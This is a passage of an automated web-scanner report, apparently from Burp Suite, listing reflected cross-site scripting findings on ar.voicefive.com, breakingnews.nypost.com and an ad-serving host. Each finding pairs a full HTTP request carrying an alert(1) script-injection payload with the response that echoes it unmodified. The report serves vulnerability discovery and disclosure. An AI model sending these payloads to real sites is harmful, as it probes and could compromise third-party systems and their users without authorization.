Cookie: ar_p43112268=exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&; ar_p68511049=exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&; ar_p71955200=exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&; ar_p72205782=exp=1&initExp=Fri Nov 26 20:18:12 2010&recExp=Fri Nov 26 20:18:12 2010&prad=56621686&arc=39457440&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1290802692%2E015%2Cwait%2D%3E10000%2C; UID=1be48349-204.0.5.41-1289109066

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Nov 2010 20:47:49 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction1468f<script>alert(1)</script>f0f715f44b8("");

1.49. http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the AR_C request parameter is copied into the HTML document as plain text between tags. The payload 65fea<script>alert(1)</script>0be7d6462b3 was submitted in the AR_C parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bmx3/broker.pli?pid=p72205782&PRAd=56621686&AR_C=3945744065fea<script>alert(1)</script>0be7d6462b3 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/promotions/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p43112268=exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&; ar_p68511049=exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&; ar_p71955200=exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&; UID=1be48349-204.0.5.41-1289109066

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Nov 2010 20:47:50 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p72205782=exp=1&initExp=Fri Nov 26 20:47:50 2010&recExp=Fri Nov 26 20:47:50 2010&prad=56621686&arc=3945744065fea%3Cscript%3Ealert%281%29%3C%2Fscript%3E0be7d6462b3&; expires=Thu 24-Feb-2011 20:47:50 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1290804470; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30303

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"56621686",Pid:"p72205782",Arc:"3945744065fea<script>alert(1)</script>0be7d6462b3",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("3945744065fea<script>
...[SNIP]...

1.50. http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the PRAd request parameter is copied into the HTML document as plain text between tags. The payload 7c6ba<script>alert(1)</script>2feb44acaf7 was submitted in the PRAd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bmx3/broker.pli?pid=p72205782&PRAd=566216867c6ba<script>alert(1)</script>2feb44acaf7&AR_C=39457440 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/promotions/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p43112268=exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&; ar_p68511049=exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&; ar_p71955200=exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&; UID=1be48349-204.0.5.41-1289109066

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Nov 2010 20:47:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p72205782=exp=1&initExp=Fri Nov 26 20:47:49 2010&recExp=Fri Nov 26 20:47:49 2010&prad=566216867c6ba%3Cscript%3Ealert%281%29%3C%2Fscript%3E2feb44acaf7&arc=39457440&; expires=Thu 24-Feb-2011 20:47:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1290804469; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30262

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"566216867c6ba<script>alert(1)</script>2feb44acaf7",Pid:"p72205782",Arc:"39457440",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("39457440"),Exp:COMSCORE.BMX.
...[SNIP]...

1.51. http://breakingnews.nypost.com/dynamic/external/ibd.morningstar.com/AP/StockMover.html [CN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://breakingnews.nypost.com
Path:   /dynamic/external/ibd.morningstar.com/AP/StockMover.html

Issue detail

The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c26ab'><script>alert(1)</script>0edf7aa4388 was submitted in the CN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707c26ab'><script>alert(1)</script>0edf7aa4388&SITE=NYNYP&SECTION=DJSP_COMPLETE&TEMPLATE=DEFAULT HTTP/1.1
Host: breakingnews.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=NYNYP; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Fri, 26 Nov 2010 20:51:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:51:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Busi
...[SNIP]...
<a href='http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707C26AB'><SCRIPT>ALERT(1)</SCRIPT>0EDF7AA4388.html?CN=AP707C26AB'>
...[SNIP]...

1.52. http://breakingnews.nypost.com/dynamic/external/ibd.morningstar.com/AP/StockMover.html [CN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://breakingnews.nypost.com
Path:   /dynamic/external/ibd.morningstar.com/AP/StockMover.html

Issue detail

The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 322cc"><script>alert(1)</script>ea993c780ea was submitted in the CN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707322cc"><script>alert(1)</script>ea993c780ea&SITE=NYNYP&SECTION=DJSP_COMPLETE&TEMPLATE=DEFAULT HTTP/1.1
Host: breakingnews.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=NYNYP; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Fri, 26 Nov 2010 20:51:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:51:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Busi
...[SNIP]...
<form name="FormAPTop" method=get action="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707322CC"><SCRIPT>ALERT(1)</SCRIPT>EA993C780EA.html" style="margin:0px;">
...[SNIP]...

1.53. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [PluID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of the PluID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccb60'-alert(1)-'997ae025cc9 was submitted in the PluID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0ccb60'-alert(1)-'997ae025cc9&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A19DB3930380CCB941F5CC2FB3B1E00A; Path=/
Content-Type: text/javascript
Content-Length: 1461
Date: Fri, 26 Nov 2010 20:48:08 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0ccb60'-alert(1)-'997ae025cc9&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$&adsafe_url='+a
...[SNIP]...

1.54. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9dae6'-alert(1)-'acf0dbd71b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe9dae6'-alert(1)-'acf0dbd71b7/adServer.bs HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E428A7D316277BA8A490BD2AAB2C033B;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3618B456B693FCDA3A5001C9348C29F4; Path=/
Content-Type: text/javascript
Content-Length: 1225
Date: Fri, 26 Nov 2010 20:41:53 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe9dae6'-alert(1)-'acf0dbd71b7/adServer.bs?adsafe_url='+adsafew+'&type='+adsafet+'">
...[SNIP]...

1.55. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b135'-alert(1)-'6e2895fb84f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs2b135'-alert(1)-'6e2895fb84f HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E428A7D316277BA8A490BD2AAB2C033B;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5127DD8FCDA6B7592B42E46B38C8ED68; Path=/
Content-Type: text/javascript
Content-Length: 1225
Date: Fri, 26 Nov 2010 20:41:53 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe/adServer.bs2b135'-alert(1)-'6e2895fb84f?adsafe_url='+adsafew+'&type='+adsafet+'">
...[SNIP]...

1.56. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9126f'-alert(1)-'6021358a216 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=289126f'-alert(1)-'6021358a216&pli=1902326&PluID=0&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=62C41BC832E7F24AC4EC03C8BB6F43A8; Path=/
Content-Type: text/javascript
Content-Length: 1461
Date: Fri, 26 Nov 2010 20:48:06 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe/adServer.bs?cn=rsb&c=289126f'-alert(1)-'6021358a216&pli=1902326&PluID=0&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D
...[SNIP]...

1.57. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [cn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of the cn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c69c9'-alert(1)-'849c8fa5112 was submitted in the cn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs?cn=rsbc69c9'-alert(1)-'849c8fa5112&c=28&pli=1902326&PluID=0&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=51A9FA45762D62BCEE8FB4DBDB498E85; Path=/
Content-Type: text/javascript
Content-Length: 1461
Date: Fri, 26 Nov 2010 20:48:06 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe/adServer.bs?cn=rsbc69c9'-alert(1)-'849c8fa5112&c=28&pli=1902326&PluID=0&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Ess
...[SNIP]...

1.58. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 691d5'-alert(1)-'f7ffe9dc798 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=300&h=250691d5'-alert(1)-'f7ffe9dc798&ord=3952419&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F6066281FA7CE8108F600BDB639986F6; Path=/
Content-Type: text/javascript
Content-Length: 1461
Date: Fri, 26 Nov 2010 20:48:09 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=300&h=250691d5'-alert(1)-'f7ffe9dc798&ord=3952419&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$&adsafe_url='+adsafew+'&typ
...[SNIP]...

1.59. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e81c'-alert(1)-'f8b51afdb8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs?9e81c'-alert(1)-'f8b51afdb8e=1 HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E428A7D316277BA8A490BD2AAB2C033B;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=151BE2FC65054D7EC39904B74296DE88; Path=/
Content-Type: text/javascript
Content-Length: 1228
Date: Fri, 26 Nov 2010 20:41:52 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe/adServer.bs?9e81c'-alert(1)-'f8b51afdb8e=1&adsafe_url='+adsafew+'&type='+adsafet+'">
...[SNIP]...

1.60. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [ncu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of the ncu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 980c0'-alert(1)-'129f7d8add2 was submitted in the ncu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$980c0'-alert(1)-'129f7d8add2 HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3FB96ACAADA6858391DE657462014B33; Path=/
Content-Type: text/javascript
Content-Length: 1461
Date: Fri, 26 Nov 2010 20:48:11 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
1902326&PluID=0&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$980c0'-alert(1)-'129f7d8add2&adsafe_url='+adsafew+'&type='+adsafet+'">
...[SNIP]...

1.61. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [ord parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of the ord request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42ed8'-alert(1)-'b883026bd8b was submitted in the ord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=300&h=250&ord=395241942ed8'-alert(1)-'b883026bd8b&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
